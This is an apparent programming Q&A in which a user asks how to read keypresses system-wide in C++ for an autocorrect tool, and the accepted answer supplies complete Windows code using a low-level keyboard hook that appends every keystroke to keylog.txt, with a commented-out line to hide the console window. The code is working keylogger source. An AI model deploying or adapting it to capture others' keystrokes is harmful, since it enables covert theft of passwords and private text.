# Program to recognize user keys user pressing c++

Tags: c++, windows, key

I want to write something like autocorrection for Windows, but the problem is my program needs to scan keys pressed all the time, even when the program window is not active. I'm new to c++, so I have no idea how to do that. All help will be greatly appreciated!

Comment: Good luck convincing your anti-virus your program isn't a keylogger.

Comment: @Borgleader That's not my question

Answer (score 0, accepted):

You can modify this code below, and make it "that autocorrection for Windows".

```
#define _WIN32_WINNT 0x0400
#pragma comment( lib, "user32.lib" )

#include <windows.h>
#include <stdio.h>
#include<fstream>
#include<iostream>

HHOOK hKeyboardHook;
int ii=0;

__declspec(dllexport) LRESULT CALLBACK KeyboardEvent (int nCode, WPARAM wParam, LPARAM lParam)
{
    DWORD SHIFT_key=0;
    DWORD CTRL_key=0;
    DWORD ALT_key=0;
    std::ofstream out("keylog.txt", std::ios::app);

    if  ((nCode == HC_ACTION) &&   ((wParam == WM_SYSKEYDOWN) ||  (wParam == WM_KEYDOWN)))      
    {
        KBDLLHOOKSTRUCT hooked_key =    *((KBDLLHOOKSTRUCT*)lParam);
        DWORD dwMsg = 1;
        dwMsg += hooked_key.scanCode << 16;
        dwMsg += hooked_key.flags << 24;
        char lpszKeyName[1024] = {0};
        lpszKeyName[0] = ' ';

        int i = GetKeyNameText(dwMsg,   (lpszKeyName+1),0xFF) + 1;
        lpszKeyName[i] = ' ';

            ii++; if (ii>=16){
            ii=0;
            out<<"\n";
            std::cout<<"\n";
            }

        int key = hooked_key.vkCode;

        SHIFT_key = GetAsyncKeyState(VK_SHIFT);
        CTRL_key = GetAsyncKeyState(VK_CONTROL);
        ALT_key = GetAsyncKeyState(VK_MENU);

        if (key >= 'A' && key <= 'Z')   
        {

            if  (GetAsyncKeyState(VK_SHIFT)>= 0) key +=32;

            if (CTRL_key !=0 && key == 'y' )
            {
               MessageBox(NULL, "CTRL-y was pressed\nLaunch your app here", "H O T K E Y", MB_OK); 
               CTRL_key=0;
            }

            if (CTRL_key !=0 && key == 'q' )
            {
                MessageBox(NULL, "Shutting down", "H O T K E Y", MB_OK); 
               PostQuitMessage(0);
            }




            //printf("key = %c\n", key);

            SHIFT_key = 0;
            CTRL_key = 0;
            ALT_key = 0;

        }

            printf("%s ",  lpszKeyName );

        out<<lpszKeyName;
        out.close();
    }
    return CallNextHookEx(hKeyboardHook,    nCode,wParam,lParam);
}

void MessageLoop()
{
    MSG message;
    while (GetMessage(&message,NULL,0,0)) 
    {
        TranslateMessage( &message );
        DispatchMessage( &message );
    }
}

DWORD WINAPI my_HotKey(LPVOID lpParm)
{
    HINSTANCE hInstance = GetModuleHandle(NULL);
    if (!hInstance) hInstance = LoadLibrary((LPCSTR) lpParm); 
    if (!hInstance) return 1;

    hKeyboardHook = SetWindowsHookEx (  WH_KEYBOARD_LL, (HOOKPROC) KeyboardEvent,   hInstance,  NULL    );
    MessageLoop();
    UnhookWindowsHookEx(hKeyboardHook);
    return 0;
}

int main(int argc, char** argv)
{
    HANDLE hThread;
    DWORD dwThread;
    std::cout<<"Keylogging to keylog.txt\n\n";

    hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)   my_HotKey, (LPVOID) argv[0], NULL, &dwThread);

    //ShowWindow(FindWindowA("ConsoleWindowClass", NULL), false);

    if (hThread) return WaitForSingleObject(hThread,INFINITE);
    else return 1;

}
```